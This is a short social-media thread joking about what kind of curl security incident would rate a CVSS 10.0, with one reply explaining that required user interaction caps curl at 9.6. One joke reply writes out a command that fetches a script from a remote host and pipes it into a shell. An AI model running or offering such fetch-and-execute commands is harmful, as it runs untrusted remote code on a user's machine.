Email or username:

Password:

Forgot your password?
All posts daniel://'s posts Post Back to profile
Top-level
Max

@bagder be grateful they didn’t rate it a 9.9 😉 ever wondered what kind of “security incident” would warrant a solid 10.0 for curl? 😄

25 Aug 2023 at 22:59 | Wall-to-wall | Open on det.social
5 comments
Ian Douglas Scott

@maxbob @bagder Naturally we're using the Spinal Tap scale for severity, so a *buffer* overflow would rate 11/10.

25 Aug 2023 at 23:54 | Open on fosstodon.org
phi1997

@maxbob
If you point curl at a URL with malicious code, you can download malicious code
@bagder

25 Aug 2023 at 23:56 | Open on mastodon.social
Do not the katie

@maxbob @bagder curl 10.0 CVE: an attacker can execute arbitrary code from a remote source by running sh -c "$(curl -fsSL https://haxx.info)" on the victim's computer!!! /j

26 Aug 2023 at 3:28 | Open on wetdry.world
Fennix :donor:

@maxbob @bagder I doubt curl could ever get a CVSSv3.1 10.0 unless there's some buried option to let it run as a service in the background unattended, listening on the network.

It'd pretty well always require user interaction, which caps a score at 9.6.

I could imagine some scenarios where like, if it was vulnerable to something a server could do in response to a request you could maybe get it up to that 9.6, but it would always be a 9.6 for curl as a utility itself.

Applications that link libcurl and use it for process urls and handle responses could maybe be higher in this hypothetical scenario but that wouldn't be down to curl itself.

@maxbob @bagder I doubt curl could ever get a CVSSv3.1 10.0 unless there's some buried option to let it run as a service in the background unattended, listening on the network.

It'd pretty well always require user interaction, which caps a score at 9.6.

I could imagine some scenarios where like, if it was vulnerable to something a server could do in response to a request you could maybe get it up to that 9.6, but it would always be a 9.6 for curl as a utility itself.

26 Aug 2023 at 4:44 | Open on infosec.exchange
Go Up